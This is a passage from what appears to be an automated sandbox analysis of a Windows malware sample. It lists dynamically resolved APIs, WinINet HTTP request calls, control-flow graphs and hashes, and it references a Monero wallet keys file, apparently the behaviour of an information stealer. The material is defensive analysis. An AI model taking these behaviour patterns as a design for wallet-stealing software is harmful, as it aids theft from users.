                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 4cefa402f675887c8dc4b646136626f4da8127204a0fca1ef2f1085bc8e697a8
                                  • Instruction ID: bf20280824d216df511beadf91e772eb2dbf2875bddff0c9157c760f2fc3af04
                                  • Opcode Fuzzy Hash: 4cefa402f675887c8dc4b646136626f4da8127204a0fca1ef2f1085bc8e697a8
                                  • Instruction Fuzzy Hash: 8DD05E7490C30CABCB00DFE0988DADDBB78FB08615F100594D90572740EA30A481CB65

                                  Control-flow Graph
                                  control_flow_graph 633 6c9f20-6c9f2a 634 6ca346-6ca3da LoadLibraryA * 8 633->634 635 6c9f30-6ca341 GetProcAddress * 43 633->635 636 6ca3dc-6ca451 GetProcAddress * 5 634->636 637 6ca456-6ca45d 634->637 635->634 636->637 638 6ca526-6ca52d 637->638 639 6ca463-6ca521 GetProcAddress * 8 637->639 640 6ca52f-6ca5a3 GetProcAddress * 5 638->640 641 6ca5a8-6ca5af 638->641 639->638 640->641 642 6ca5b5-6ca642 GetProcAddress * 6 641->642 643 6ca647-6ca64e 641->643 642->643 644 6ca72f-6ca736 643->644 645 6ca654-6ca72a GetProcAddress * 9 643->645 646 6ca738-6ca7ad GetProcAddress * 5 644->646 647 6ca7b2-6ca7b9 644->647 645->644 646->647 648 6ca7ec-6ca7f3 647->648 649 6ca7bb-6ca7e7 GetProcAddress * 2 647->649 650 6ca825-6ca82c 648->650 651 6ca7f5-6ca820 GetProcAddress * 2 648->651 649->648 652 6ca922-6ca929 650->652 653 6ca832-6ca91d GetProcAddress * 10 650->653 651->650 654 6ca98d-6ca994 652->654 655 6ca92b-6ca988 GetProcAddress * 4 652->655 653->652 656 6ca9ae-6ca9b5 654->656 657 6ca996-6ca9a9 GetProcAddress 654->657 655->654 658 6caa18-6caa19 656->658 659 6ca9b7-6caa13 GetProcAddress * 4 656->659 657->656 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01465C50), ref: 006C9F3D
                                  • GetProcAddress.KERNEL32(74DD0000,01465B50), ref: 006C9F55
                                  • GetProcAddress.KERNEL32(74DD0000,01479610), ref: 006C9F6E
                                  • GetProcAddress.KERNEL32(74DD0000,01479688), ref: 006C9F86
                                  • GetProcAddress.KERNEL32(74DD0000,014796D0), ref: 006C9F9E
                                  • GetProcAddress.KERNEL32(74DD0000,014796A0), ref: 006C9FB7
                                  • GetProcAddress.KERNEL32(74DD0000,0146B798), ref: 006C9FCF
                                  • GetProcAddress.KERNEL32(74DD0000,0147D410), ref: 006C9FE7
                                  • GetProcAddress.KERNEL32(74DD0000,0147D440), ref: 006CA000
                                  • GetProcAddress.KERNEL32(74DD0000,0147D3F8), ref: 006CA018
                                  • GetProcAddress.KERNEL32(74DD0000,0147D5A8), ref: 006CA030
                                  • GetProcAddress.KERNEL32(74DD0000,01465C10), ref: 006CA049
                                  • GetProcAddress.KERNEL32(74DD0000,01465DB0), ref: 006CA061
                                  • GetProcAddress.KERNEL32(74DD0000,01465DF0), ref: 006CA079
                                  • GetProcAddress.KERNEL32(74DD0000,01465B70), ref: 006CA092
                                  • GetProcAddress.KERNEL32(74DD0000,0147D458), ref: 006CA0AA
                                  • GetProcAddress.KERNEL32(74DD0000,0147D4B8), ref: 006CA0C2
                                  • GetProcAddress.KERNEL32(74DD0000,0146B810), ref: 006CA0DB
                                  • GetProcAddress.KERNEL32(74DD0000,01465E10), ref: 006CA0F3
                                  • GetProcAddress.KERNEL32(74DD0000,0147D4E8), ref: 006CA10B
                                  • GetProcAddress.KERNEL32(74DD0000,0147D488), ref: 006CA124
                                  • GetProcAddress.KERNEL32(74DD0000,0147D548), ref: 006CA13C
                                  • GetProcAddress.KERNEL32(74DD0000,0147D4D0), ref: 006CA154
                                  • GetProcAddress.KERNEL32(74DD0000,01465C70), ref: 006CA16D
                                  • GetProcAddress.KERNEL32(74DD0000,0147D428), ref: 006CA185
                                  • GetProcAddress.KERNEL32(74DD0000,0147D470), ref: 006CA19D
                                  • GetProcAddress.KERNEL32(74DD0000,0147D4A0), ref: 006CA1B6
                                  • GetProcAddress.KERNEL32(74DD0000,0147D518), ref: 006CA1CE
                                  • GetProcAddress.KERNEL32(74DD0000,0147D500), ref: 006CA1E6
                                  • GetProcAddress.KERNEL32(74DD0000,0147D530), ref: 006CA1FF
                                  • GetProcAddress.KERNEL32(74DD0000,0147D560), ref: 006CA217
                                  • GetProcAddress.KERNEL32(74DD0000,0147D578), ref: 006CA22F
                                  • GetProcAddress.KERNEL32(74DD0000,0147D590), ref: 006CA248
                                  • GetProcAddress.KERNEL32(74DD0000,0147A360), ref: 006CA260
                                  • GetProcAddress.KERNEL32(74DD0000,0147D050), ref: 006CA278
                                  • GetProcAddress.KERNEL32(74DD0000,0147D0E0), ref: 006CA291
                                  • GetProcAddress.KERNEL32(74DD0000,01465CB0), ref: 006CA2A9
                                  • GetProcAddress.KERNEL32(74DD0000,0147CE40), ref: 006CA2C1
                                  • GetProcAddress.KERNEL32(74DD0000,014657B0), ref: 006CA2DA
                                  • GetProcAddress.KERNEL32(74DD0000,0147CF60), ref: 006CA2F2
                                  • GetProcAddress.KERNEL32(74DD0000,0147D008), ref: 006CA30A
                                  • GetProcAddress.KERNEL32(74DD0000,01465750), ref: 006CA323
                                  • GetProcAddress.KERNEL32(74DD0000,014659B0), ref: 006CA33B
                                  • LoadLibraryA.KERNEL32(0147CF90,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA34D
                                  • LoadLibraryA.KERNEL32(0147CE58,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA35E
                                  • LoadLibraryA.KERNEL32(0147CF78,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA370
                                  • LoadLibraryA.KERNEL32(0147D020,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA382
                                  • LoadLibraryA.KERNEL32(0147CF18,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA393
                                  • LoadLibraryA.KERNEL32(0147CFD8,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA3A5
                                  • LoadLibraryA.KERNEL32(0147CDF8,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA3B7
                                  • LoadLibraryA.KERNEL32(0147CFA8,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA3C8
                                  • GetProcAddress.KERNEL32(75290000,01465930), ref: 006CA3EA
                                  • GetProcAddress.KERNEL32(75290000,0147CE10), ref: 006CA402
                                  • GetProcAddress.KERNEL32(75290000,01479168), ref: 006CA41A
                                  • GetProcAddress.KERNEL32(75290000,0147CE88), ref: 006CA433
                                  • GetProcAddress.KERNEL32(75290000,01465830), ref: 006CA44B
                                  • GetProcAddress.KERNEL32(734C0000,0146B7E8), ref: 006CA470
                                  • GetProcAddress.KERNEL32(734C0000,01465790), ref: 006CA489
                                  • GetProcAddress.KERNEL32(734C0000,0146B900), ref: 006CA4A1
                                  • GetProcAddress.KERNEL32(734C0000,0147CFC0), ref: 006CA4B9
                                  • GetProcAddress.KERNEL32(734C0000,0147D068), ref: 006CA4D2
                                  • GetProcAddress.KERNEL32(734C0000,014659D0), ref: 006CA4EA
                                  • GetProcAddress.KERNEL32(734C0000,01465990), ref: 006CA502
                                  • GetProcAddress.KERNEL32(734C0000,0147CFF0), ref: 006CA51B
                                  • GetProcAddress.KERNEL32(752C0000,01465A90), ref: 006CA53C
                                  • GetProcAddress.KERNEL32(752C0000,01465A10), ref: 006CA554
                                  • GetProcAddress.KERNEL32(752C0000,0147CED0), ref: 006CA56D
                                  • GetProcAddress.KERNEL32(752C0000,0147CEE8), ref: 006CA585
                                  • GetProcAddress.KERNEL32(752C0000,01465850), ref: 006CA59D
                                  • GetProcAddress.KERNEL32(74EC0000,0146B6A8), ref: 006CA5C3
                                  • GetProcAddress.KERNEL32(74EC0000,0146BA68), ref: 006CA5DB
                                  • GetProcAddress.KERNEL32(74EC0000,0147D038), ref: 006CA5F3
                                  • GetProcAddress.KERNEL32(74EC0000,01465870), ref: 006CA60C
                                  • GetProcAddress.KERNEL32(74EC0000,014656B0), ref: 006CA624
                                  • GetProcAddress.KERNEL32(74EC0000,0146B838), ref: 006CA63C
                                  • GetProcAddress.KERNEL32(75BD0000,0147D080), ref: 006CA662
                                  • GetProcAddress.KERNEL32(75BD0000,014658F0), ref: 006CA67A
                                  • GetProcAddress.KERNEL32(75BD0000,01479128), ref: 006CA692
                                  • GetProcAddress.KERNEL32(75BD0000,0147D098), ref: 006CA6AB
                                  • GetProcAddress.KERNEL32(75BD0000,0147D0C8), ref: 006CA6C3
                                  • GetProcAddress.KERNEL32(75BD0000,01465A30), ref: 006CA6DB
                                  • GetProcAddress.KERNEL32(75BD0000,014656D0), ref: 006CA6F4
                                  • GetProcAddress.KERNEL32(75BD0000,0147CE70), ref: 006CA70C
                                  • GetProcAddress.KERNEL32(75BD0000,0147CF00), ref: 006CA724
                                  • GetProcAddress.KERNEL32(75A70000,014657F0), ref: 006CA746
                                  • GetProcAddress.KERNEL32(75A70000,0147CEA0), ref: 006CA75E
                                  • GetProcAddress.KERNEL32(75A70000,0147D0B0), ref: 006CA776
                                  • GetProcAddress.KERNEL32(75A70000,0147CF30), ref: 006CA78F
                                  • GetProcAddress.KERNEL32(75A70000,0147CEB8), ref: 006CA7A7
                                  • GetProcAddress.KERNEL32(75450000,01465710), ref: 006CA7C8
                                  • GetProcAddress.KERNEL32(75450000,01465950), ref: 006CA7E1
                                  • GetProcAddress.KERNEL32(75DA0000,01465890), ref: 006CA802
                                  • GetProcAddress.KERNEL32(75DA0000,0147CE28), ref: 006CA81A
                                  • GetProcAddress.KERNEL32(6F070000,01465A50), ref: 006CA840
                                  • GetProcAddress.KERNEL32(6F070000,014657D0), ref: 006CA858
                                  • GetProcAddress.KERNEL32(6F070000,01465810), ref: 006CA870
                                  • GetProcAddress.KERNEL32(6F070000,0147CF48), ref: 006CA889
                                  • GetProcAddress.KERNEL32(6F070000,01465A70), ref: 006CA8A1
                                  • GetProcAddress.KERNEL32(6F070000,01465910), ref: 006CA8B9
                                  • GetProcAddress.KERNEL32(6F070000,014656F0), ref: 006CA8D2
                                  • GetProcAddress.KERNEL32(6F070000,014658B0), ref: 006CA8EA
                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 006CA901
                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 006CA917
                                  • GetProcAddress.KERNEL32(75AF0000,0147D110), ref: 006CA939
                                  • GetProcAddress.KERNEL32(75AF0000,01479148), ref: 006CA951
                                  • GetProcAddress.KERNEL32(75AF0000,0147D2F0), ref: 006CA969
                                  • GetProcAddress.KERNEL32(75AF0000,0147D188), ref: 006CA982
                                  • GetProcAddress.KERNEL32(75D90000,01465770), ref: 006CA9A3
                                  • GetProcAddress.KERNEL32(6F9D0000,0147D398), ref: 006CA9C4
                                  • GetProcAddress.KERNEL32(6F9D0000,014658D0), ref: 006CA9DD
                                  • GetProcAddress.KERNEL32(6F9D0000,0147D158), ref: 006CA9F5
                                  • GetProcAddress.KERNEL32(6F9D0000,0147D170), ref: 006CAA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: cf66d27819fe6afb7d7154dc570af7a11926ffa95843faa6ce4145b388da1d2d
                                  • Instruction ID: af9c85e092e5151595cca561cdb8cd550361798832ad962edb014dbaf89b90cf
                                  • Opcode Fuzzy Hash: cf66d27819fe6afb7d7154dc570af7a11926ffa95843faa6ce4145b388da1d2d
                                  • Instruction Fuzzy Hash: D162FDB663C2009FC344DFE8ED88A56BBB9B74D701720861ABA19C7770D735E941EB60

                                  Control-flow Graph
                                  control_flow_graph 801 6b48d0-6b4992 call 6caab0 call 6b4800 call 6caa50 * 5 InternetOpenA StrCmpCA 816 6b499b-6b499f 801->816 817 6b4994 801->817 818 6b4f1b-6b4f43 InternetCloseHandle call 6cade0 call 6ba210 816->818 819 6b49a5-6b4b1d call 6c8cf0 call 6cac30 call 6cabb0 call 6cab10 * 2 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cac30 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cac30 call 6cabb0 call 6cab10 * 2 InternetConnectA 816->819 817->816 829 6b4f82-6b4ff2 call 6c8b20 * 2 call 6caab0 call 6cab10 * 8 818->829 830 6b4f45-6b4f7d call 6cab30 call 6cacc0 call 6cabb0 call 6cab10 818->830 819->818 905 6b4b23-6b4b27 819->905 830->829 906 6b4b29-6b4b33 905->906 907 6b4b35 905->907 908 6b4b3f-6b4b72 HttpOpenRequestA 906->908 907->908 909 6b4b78-6b4e78 call 6cacc0 call 6cabb0 call 6cab10 call 6cac30 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cac30 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cac30 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cac30 call 6cabb0 call 6cab10 call 6caa50 call 6cac30 * 2 call 6cabb0 call 6cab10 * 2 call 6cade0 lstrlen call 6cade0 * 2 lstrlen call 6cade0 HttpSendRequestA 908->909 910 6b4f0e-6b4f15 InternetCloseHandle 908->910 1021 6b4e82-6b4eac InternetReadFile 909->1021 910->818 1022 6b4eae-6b4eb5 1021->1022 1023 6b4eb7-6b4f09 InternetCloseHandle call 6cab10 1021->1023 1022->1023 1024 6b4eb9-6b4ef7 call 6cacc0 call 6cabb0 call 6cab10 1022->1024 1023->910 1024->1021
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006B4889
                                    • Part of subcall function 006B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 006B4899
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006B4965
                                  • StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B498A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006B4B0A
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006D0DDE,00000000,?,?,00000000,?,",00000000,?,0147EA08), ref: 006B4E38
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 006B4E54
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 006B4E68
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006B4E99
                                  • InternetCloseHandle.WININET(00000000), ref: 006B4EFD
                                  • InternetCloseHandle.WININET(00000000), ref: 006B4F15
                                  • HttpOpenRequestA.WININET(00000000,0147EAC8,?,0147E158,00000000,00000000,00400100,00000000), ref: 006B4B65
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 006B4F1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: e7a9d425545b40f30ddae2e660c0e9c01cce865897041e9b04fe25053795812f
                                  • Instruction ID: 79f36edffbd5114fae774170330702c397baaa2d2ef8eb6d1313d5c3e01464a5
                                  • Opcode Fuzzy Hash: e7a9d425545b40f30ddae2e660c0e9c01cce865897041e9b04fe25053795812f
                                  • Instruction Fuzzy Hash: F112C67291011CAACB55EBD0DDA2FFEB37AEF54304F10419DB10666192EF706E48CB6A

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 6c5760-6c57c7 call 6c5d20 call 6cab30 * 3 call 6caa50 * 4 1106 6c57cc-6c57d3 1090->1106 1107 6c57d5-6c5806 call 6cab30 call 6caab0 call 6b1590 call 6c5440 1106->1107 1108 6c5827-6c589c call 6caa50 * 2 call 6b1590 call 6c5510 call 6cabb0 call 6cab10 call 6cade0 StrCmpCA 1106->1108 1124 6c580b-6c5822 call 6cabb0 call 6cab10 1107->1124 1133 6c58e3-6c58f9 call 6cade0 StrCmpCA 1108->1133 1138 6c589e-6c58de call 6caab0 call 6b1590 call 6c5440 call 6cabb0 call 6cab10 1108->1138 1124->1133 1140 6c5a2c-6c5a94 call 6cabb0 call 6cab30 * 2 call 6b16b0 call 6cab10 * 4 call 6b1670 call 6b1550 1133->1140 1141 6c58ff-6c5906 1133->1141 1138->1133 1270 6c5d13-6c5d16 1140->1270 1144 6c590c-6c5913 1141->1144 1145 6c5a2a-6c5aaf call 6cade0 StrCmpCA 1141->1145 1149 6c596e-6c59e3 call 6caa50 * 2 call 6b1590 call 6c5510 call 6cabb0 call 6cab10 call 6cade0 StrCmpCA 1144->1149 1150 6c5915-6c5969 call 6cab30 call 6caab0 call 6b1590 call 6c5440 call 6cabb0 call 6cab10 1144->1150 1164 6c5ab5-6c5abc 1145->1164 1165 6c5be1-6c5c49 call 6cabb0 call 6cab30 * 2 call 6b16b0 call 6cab10 * 4 call 6b1670 call 6b1550 1145->1165 1149->1145 1250 6c59e5-6c5a25 call 6caab0 call 6b1590 call 6c5440 call 6cabb0 call 6cab10 1149->1250 1150->1145 1171 6c5bdf-6c5c64 call 6cade0 StrCmpCA 1164->1171 1172 6c5ac2-6c5ac9 1164->1172 1165->1270 1201 6c5c78-6c5ce1 call 6cabb0 call 6cab30 * 2 call 6b16b0 call 6cab10 * 4 call 6b1670 call 6b1550 1171->1201 1202 6c5c66-6c5c71 Sleep 1171->1202 1180 6c5acb-6c5b1e call 6cab30 call 6caab0 call 6b1590 call 6c5440 call 6cabb0 call 6cab10 1172->1180 1181 6c5b23-6c5b98 call 6caa50 * 2 call 6b1590 call 6c5510 call 6cabb0 call 6cab10 call 6cade0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 6c5b9a-6c5bda call 6caab0 call 6b1590 call 6c5440 call 6cabb0 call 6cab10 1181->1275 1201->1270 1202->1106 1250->1145 1275->1171
                                  APIs
                                    • Part of subcall function 006CAB30: lstrlen.KERNEL32(006B4F55,?,?,006B4F55,006D0DDF), ref: 006CAB3B
                                    • Part of subcall function 006CAB30: lstrcpy.KERNEL32(006D0DDF,00000000), ref: 006CAB95
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006C5894
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006C58F1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006C5AA7
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006C5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006C5478
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006C5568
                                    • Part of subcall function 006C5510: lstrlen.KERNEL32(00000000), ref: 006C557F
                                    • Part of subcall function 006C5510: StrStrA.SHLWAPI(00000000,00000000), ref: 006C55B4
                                    • Part of subcall function 006C5510: lstrlen.KERNEL32(00000000), ref: 006C55D3
                                    • Part of subcall function 006C5510: lstrlen.KERNEL32(00000000), ref: 006C55FE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006C59DB
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006C5B90
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006C5C5C
                                  • Sleep.KERNEL32(0000EA60), ref: 006C5C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: b81bd3b276f56a1a341c2d2335c84894e7dc365f1e85bb1e293464839e8c0d51
                                  • Instruction ID: caf24ead2924d7cf4325cf79b5d22150967b114c76ab578dfa46bd1bbee2471c
                                  • Opcode Fuzzy Hash: b81bd3b276f56a1a341c2d2335c84894e7dc365f1e85bb1e293464839e8c0d51
                                  • Instruction Fuzzy Hash: F8E10E729105089ACB54FBE0EDA6FFD733AEF54304F40855CA50766191EF34AE48CBAA

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
